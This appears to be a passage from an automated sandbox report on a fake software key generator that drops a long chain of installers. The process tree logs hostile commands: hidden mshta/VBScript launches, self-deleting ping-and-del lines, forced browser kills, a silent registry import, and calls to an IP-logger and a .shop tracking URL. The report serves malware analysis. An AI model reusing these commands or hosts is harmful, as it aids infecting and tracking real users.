pid Process 2064 Setup.exe 184 AD754B4D3FE2C4EE.exe 212 AD754B4D3FE2C4EE.exe 748 firefox.exe 3716 1615354024190.exe 2560 firefox.exe 2924 1615354028456.exe 4212 firefox.exe 3708 1615354033690.exe 2560 wxqhvcpn0bf.exe 2596 wxqhvcpn0bf.tmp 2184 chashepro3.exe 1008 askinstall24.exe 2304 vpn.exe 3120 IBInstaller_97039.exe 5096 chashepro3.tmp 4488 vpn.tmp 2280 Setup3310.exe 4544 IBInstaller_97039.tmp 4472 Setup3310.tmp 3824 Brava.exe 4712 chrome_proxy.exe 3616 app.exe 1332 winlthst.exe 5568 ThunderFW.exe 5828 jobyfr3bzz5.exe 5932 jobyfr3bzz5.tmp 2580 Setup.exe 220 Setup.tmp 5732 tapinstall.exe 2120 MiniThunderPlatform.exe 2592 7za.exe 5508 chrome.exe 6184 Messure.exe 6232 Messure.tmp 6204 7za.exe 6392 mex.exe 6772 Setup.exe 6656 windefender.exe 6880 tapinstall.exe 6656 windefender.exe 2600 mask_svc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4760 wrote to memory of 2232 4760 Myob_Accountright_Plus_19_0_key_generator.exe 78 PID 4760 wrote to memory of 2232 4760 Myob_Accountright_Plus_19_0_key_generator.exe 78 PID 4760 wrote to memory of 2232 4760 Myob_Accountright_Plus_19_0_key_generator.exe 78 PID 2232 wrote to memory of 836 2232 cmd.exe 81 PID 2232 wrote to memory of 836 2232 cmd.exe 81 PID 2232 wrote to memory of 836 2232 cmd.exe 81 PID 2232 wrote to memory of 928 2232 cmd.exe 82 PID 2232 wrote to memory of 928 2232 cmd.exe 82 PID 2232 wrote to memory of 928 2232 cmd.exe 82 PID 2232 wrote to memory of 1048 2232 cmd.exe 83 PID 2232 wrote to memory of 1048 2232 cmd.exe 83 PID 2232 wrote to memory of 1048 2232 cmd.exe 83 PID 2232 wrote to memory of 1172 2232 cmd.exe 84 PID 2232 wrote to memory of 1172 2232 cmd.exe 84 PID 2232 wrote to memory of 1172 2232 cmd.exe 84 PID 836 wrote to memory of 4076 836 keygen-pr.exe 85 PID 836 wrote to memory of 4076 836 keygen-pr.exe 85 PID 836 wrote to memory of 4076 836 keygen-pr.exe 85 PID 1172 wrote to memory of 2064 1172 keygen-step-4.exe 86 PID 1172 wrote to memory of 2064 1172 keygen-step-4.exe 86 PID 1172 wrote to memory of 2064 1172 keygen-step-4.exe 86 PID 1048 wrote to memory of 4520 1048 keygen-step-3.exe 87 PID 1048 wrote to memory of 4520 1048 keygen-step-3.exe 87 PID 1048 wrote to memory of 4520 1048 keygen-step-3.exe 87 PID 4076 wrote to memory of 4480 4076 key.exe 89 PID 4076 wrote to memory of 4480 4076 key.exe 89 PID 4076 wrote to memory of 4480 4076 key.exe 89 PID 4520 wrote to memory of 4552 4520 cmd.exe 90 PID 4520 wrote to memory of 4552 4520 cmd.exe 90 PID 4520 wrote to memory of 4552 4520 cmd.exe 90 PID 2064 wrote to memory of 4564 2064 Setup.exe 91 PID 2064 wrote to memory of 4564 2064 Setup.exe 91 PID 2064 wrote to memory of 4564 2064 Setup.exe 91 PID 316 wrote to memory of 4736 316 msiexec.exe 93 PID 316 wrote to memory of 4736 316 msiexec.exe 93 PID 316 wrote to memory of 4736 316 msiexec.exe 93 PID 2064 wrote to memory of 184 2064 Setup.exe 94 PID 2064 wrote to memory of 184 2064 Setup.exe 94 PID 2064 wrote to memory of 184 2064 Setup.exe 94 PID 2064 wrote to memory of 212 2064 Setup.exe 95 PID 2064 wrote to memory of 212 2064 Setup.exe 95 PID 2064 wrote to memory of 212 2064 Setup.exe 95 PID 2064 wrote to memory of 2020 2064 Setup.exe 96 PID 2064 wrote to memory of 2020 2064 Setup.exe 96 PID 2064 wrote to memory of 2020 2064 Setup.exe 96 PID 1172 wrote to memory of 2844 1172 keygen-step-4.exe 97 PID 1172 wrote to memory of 2844 1172 keygen-step-4.exe 97 PID 1172 wrote to memory of 2844 1172 keygen-step-4.exe 97 PID 2020 wrote to memory of 4804 2020 cmd.exe 99 PID 2020 wrote to memory of 4804 2020 cmd.exe 99 PID 2020 wrote to memory of 4804 2020 cmd.exe 99 PID 2844 wrote to memory of 4008 2844 askinstall20.exe 100 PID 2844 wrote to memory of 4008 2844 askinstall20.exe 100 PID 2844 wrote to memory of 4008 2844 askinstall20.exe 100 PID 4008 wrote to memory of 3512 4008 cmd.exe 102 PID 4008 wrote to memory of 3512 4008 cmd.exe 102 PID 4008 wrote to memory of 3512 4008 cmd.exe 102 PID 184 wrote to memory of 748 184 AD754B4D3FE2C4EE.exe 103 PID 184 wrote to memory of 748 184 AD754B4D3FE2C4EE.exe 103 PID 184 wrote to memory of 748 184 AD754B4D3FE2C4EE.exe 103 PID 184 wrote to memory of 748 184 AD754B4D3FE2C4EE.exe 103 PID 184 wrote to memory of 748 184 AD754B4D3FE2C4EE.exe 103 PID 184 wrote to memory of 748 184 AD754B4D3FE2C4EE.exe 103 PID 212 wrote to memory of 4264 212 AD754B4D3FE2C4EE.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\Myob_Accountright_Plus_19_0_key_generator.exe"C:\Users\Admin\AppData\Local\Temp\Myob_Accountright_Plus_19_0_key_generator.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:4480
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:928
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:4552
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4564
-
-
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exeC:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 0011 installp15⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:184 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:748
-
-
C:\Users\Admin\AppData\Roaming\1615354024190.exe"C:\Users\Admin\AppData\Roaming\1615354024190.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615354024190.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3716
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:2560
-
-
C:\Users\Admin\AppData\Roaming\1615354028456.exe"C:\Users\Admin\AppData\Roaming\1615354028456.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615354028456.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2924
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:4212
-
-
C:\Users\Admin\AppData\Roaming\1615354033690.exe"C:\Users\Admin\AppData\Roaming\1615354033690.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615354033690.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3708
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5568
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:2120
-
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent6⤵PID:8084
-
C:\Users\Admin\AppData\Local\Temp\is-0N94T.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-0N94T.tmp\23E04C4F32EF2158.tmp" /SL5="$105A6,762308,115712,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent7⤵PID:4260
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"8⤵PID:7068
-
-
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s18⤵PID:7396
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"9⤵PID:6516
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"6⤵PID:2536
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:4740
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exeC:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 200 installp15⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:4264
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:3908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"6⤵PID:2208
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:1360
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:4804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:3512
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"4⤵
- Executes dropped EXE
PID:1564 -
C:\Users\Admin\AppData\Local\Temp\SI484NIRL5\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SI484NIRL5\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1176 -
C:\Users\Admin\AppData\Local\Temp\SI484NIRL5\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SI484NIRL5\multitimer.exe" 1 3.1615353818.604857daf0322 1016⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3340 -
C:\Users\Admin\AppData\Local\Temp\SI484NIRL5\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SI484NIRL5\multitimer.exe" 2 3.1615353818.604857daf03227⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4320 -
C:\Users\Admin\AppData\Local\Temp\vzjdjcfpinq\wxqhvcpn0bf.exe"C:\Users\Admin\AppData\Local\Temp\vzjdjcfpinq\wxqhvcpn0bf.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2560 -
C:\Users\Admin\AppData\Local\Temp\is-SP9IC.tmp\wxqhvcpn0bf.tmp"C:\Users\Admin\AppData\Local\Temp\is-SP9IC.tmp\wxqhvcpn0bf.tmp" /SL5="$901E8,870426,780800,C:\Users\Admin\AppData\Local\Temp\vzjdjcfpinq\wxqhvcpn0bf.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2596 -
C:\Users\Admin\AppData\Local\Temp\is-AKRVE.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-AKRVE.tmp\winlthst.exe" test1 test110⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1332 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 86811⤵
- Program crash
PID:676
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\34vvtrfdee3\id1v20wqnjd.exe"C:\Users\Admin\AppData\Local\Temp\34vvtrfdee3\id1v20wqnjd.exe" testparams8⤵
- Executes dropped EXE
PID:1316 -
C:\Users\Admin\AppData\Roaming\ezgqiwaw4wj\jobyfr3bzz5.exe"C:\Users\Admin\AppData\Roaming\ezgqiwaw4wj\jobyfr3bzz5.exe" /VERYSILENT /p=testparams9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5828 -
C:\Users\Admin\AppData\Local\Temp\is-IE1MH.tmp\jobyfr3bzz5.tmp"C:\Users\Admin\AppData\Local\Temp\is-IE1MH.tmp\jobyfr3bzz5.tmp" /SL5="$3025E,552809,216064,C:\Users\Admin\AppData\Roaming\ezgqiwaw4wj\jobyfr3bzz5.exe" /VERYSILENT /p=testparams10⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5932
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vxhqx10e5ft\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\vxhqx10e5ft\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3120 -
C:\Users\Admin\AppData\Local\Temp\is-JCTME.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-JCTME.tmp\IBInstaller_97039.tmp" /SL5="$102B8,14439881,721408,C:\Users\Admin\AppData\Local\Temp\vxhqx10e5ft\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4544 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵
- Checks computer location settings
PID:2856
-
-
C:\Users\Admin\AppData\Local\Temp\is-J8FS1.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-J8FS1.tmp\{app}\chrome_proxy.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4712 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-J8FS1.tmp\{app}\chrome_proxy.exe"11⤵PID:5288
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
PID:5396
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vo111w2gtk0\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\vo111w2gtk0\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2280 -
C:\Users\Admin\AppData\Local\Temp\is-155NF.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-155NF.tmp\Setup3310.tmp" /SL5="$102D0,802346,56832,C:\Users\Admin\AppData\Local\Temp\vo111w2gtk0\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4472 -
C:\Users\Admin\AppData\Local\Temp\is-O9BTF.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-O9BTF.tmp\Setup.exe" /Verysilent10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2580 -
C:\Users\Admin\AppData\Local\Temp\is-PCJ0Q.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-PCJ0Q.tmp\Setup.tmp" /SL5="$20448,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-O9BTF.tmp\Setup.exe" /Verysilent11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:220 -
C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\Messure.exe"C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\Messure.exe" /Verysilent12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6184 -
C:\Users\Admin\AppData\Local\Temp\is-MN03C.tmp\Messure.tmp"C:\Users\Admin\AppData\Local\Temp\is-MN03C.tmp\Messure.tmp" /SL5="$302E4,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\Messure.exe" /Verysilent13⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:6232 -
C:\Users\Admin\AppData\Local\Temp\is-HO8I6.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-HO8I6.tmp\Setup.exe" /VERYSILENT14⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:6772 -
C:\ProgramData\3GzhBdrEazKFpDWZPQsyJa7TxsUGTNMcb2FDh.tmpC:\ProgramData\3GzhBdrEazKFpDWZPQsyJa7TxsUGTNMcb2FDh.tmp15⤵PID:6696
-
C:\ProgramData\3GzhBdrEazKFpDWZPQsyJa7TxsUGTNMcb2FDh.tmp"{path}"16⤵PID:7816
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\PictureLAb.exe" /Verysilent12⤵PID:5940
-
C:\Users\Admin\AppData\Local\Temp\is-I00D7.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-I00D7.tmp\PictureLAb.tmp" /SL5="$3039C,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\PictureLAb.exe" /Verysilent13⤵PID:2988
-
C:\Users\Admin\AppData\Local\Temp\is-EKOKD.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-EKOKD.tmp\Setup.exe" /VERYSILENT14⤵PID:3080
-
C:\Users\Admin\AppData\Local\Temp\is-SOG0F.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-SOG0F.tmp\Setup.tmp" /SL5="$204E2,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-EKOKD.tmp\Setup.exe" /VERYSILENT15⤵PID:4220
-
C:\Users\Admin\AppData\Local\Temp\is-VV2PA.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-VV2PA.tmp\def.exe" /S /UID=lab21416⤵PID:2140
-
C:\Program Files\Microsoft Office 15\BJWDNHFWMA\prolab.exe"C:\Program Files\Microsoft Office 15\BJWDNHFWMA\prolab.exe" /VERYSILENT17⤵PID:5956
-
C:\Users\Admin\AppData\Local\Temp\is-J7LN4.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-J7LN4.tmp\prolab.tmp" /SL5="$604C6,575243,216576,C:\Program Files\Microsoft Office 15\BJWDNHFWMA\prolab.exe" /VERYSILENT18⤵PID:5516
-
-
-
C:\Users\Admin\AppData\Local\Temp\e6-b5a20-0eb-209a8-1b4144a31ec9c\Tyqegozhaky.exe"C:\Users\Admin\AppData\Local\Temp\e6-b5a20-0eb-209a8-1b4144a31ec9c\Tyqegozhaky.exe"17⤵PID:5400
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0slror0q.5tw\md7_7dfj.exe & exit18⤵PID:4936
-
C:\Users\Admin\AppData\Local\Temp\0slror0q.5tw\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\0slror0q.5tw\md7_7dfj.exe19⤵PID:3100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\33arngmd.s4g\askinstall18.exe & exit18⤵PID:6316
-
C:\Users\Admin\AppData\Local\Temp\33arngmd.s4g\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\33arngmd.s4g\askinstall18.exe19⤵PID:7008
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe20⤵PID:1148
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe21⤵
- Kills process with taskkill
PID:7096
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4xzm2rdt.was\customer4.exe & exit18⤵PID:5552
-
C:\Users\Admin\AppData\Local\Temp\4xzm2rdt.was\customer4.exeC:\Users\Admin\AppData\Local\Temp\4xzm2rdt.was\customer4.exe19⤵PID:5132
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"20⤵PID:1716
-
C:\Windows\regedit.exeregedit /s chrome.reg21⤵
- Runs .reg file with regedit
PID:6236
-
-
C:\Windows\SYSTEM32\TASKKILL.exeTASKKILL /F /IM chrome.exe21⤵
- Kills process with taskkill
PID:6556
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chrome64.bat21⤵PID:4668
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)22⤵PID:6348
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\chrome64.bat" h"23⤵PID:6408
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"24⤵PID:6776
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2025⤵PID:6124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1640 /prefetch:825⤵PID:7132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1588 /prefetch:225⤵PID:6876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:125⤵
- Modifies Internet Explorer settings
PID:6020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2688 /prefetch:125⤵PID:5764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3224 /prefetch:825⤵PID:2084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:125⤵PID:4524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:125⤵PID:6804
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:125⤵PID:6808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4140 /prefetch:825⤵PID:4588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:125⤵PID:6680
-
-
